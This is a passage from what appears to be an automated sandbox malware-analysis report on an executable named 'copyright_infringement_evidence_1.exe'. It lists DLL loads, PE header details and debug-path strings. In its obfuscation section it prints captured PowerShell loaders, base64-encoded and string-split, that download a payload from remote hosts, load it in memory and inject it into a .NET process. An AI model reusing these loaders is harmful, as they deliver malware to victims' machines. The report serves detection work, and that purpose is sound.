            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: copyright_infringement_evidence_1.exeStatic PE information: certificate valid
            Source: copyright_infringement_evidence_1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: copyright_infringement_evidence_1.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: copyright_infringement_evidence_1.exeStatic file information: File size 2215688 > 1048576
            Source: copyright_infringement_evidence_1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x158800
            Source: copyright_infringement_evidence_1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: copyright_infringement_evidence_1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: copyright_infringement_evidence_1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: copyright_infringement_evidence_1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: copyright_infringement_evidence_1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: copyright_infringement_evidence_1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: copyright_infringement_evidence_1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: copyright_infringement_evidence_1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{ source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb A source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ib.pdb%~ source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n.pdb source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: btem.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bpdbtem.pdbn source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb2[0 source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb-d source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}i source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: re.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: copyright_infringement_evidence_1.pdb source: copyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Are source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2522177063.000001EF69D90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Target.pdbm source: powershell.exe, 00000023.00000002.2530199536.0000020828219000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: *e.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ion.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: re.pdbZJK source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 6?ystem.Core.pdb=K source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbLZ source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
            Source: copyright_infringement_evidence_1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: copyright_infringement_evidence_1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: copyright_infringement_evidence_1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: copyright_infringement_evidence_1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: copyright_infringement_evidence_1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProcess32", "desativado","")'; Invoke-Expression $command
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProces
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/zbEuc/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "tondinho", "AppLaunch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProcess32", "desativado","")'; Invoke-Expression $command
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProces
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBj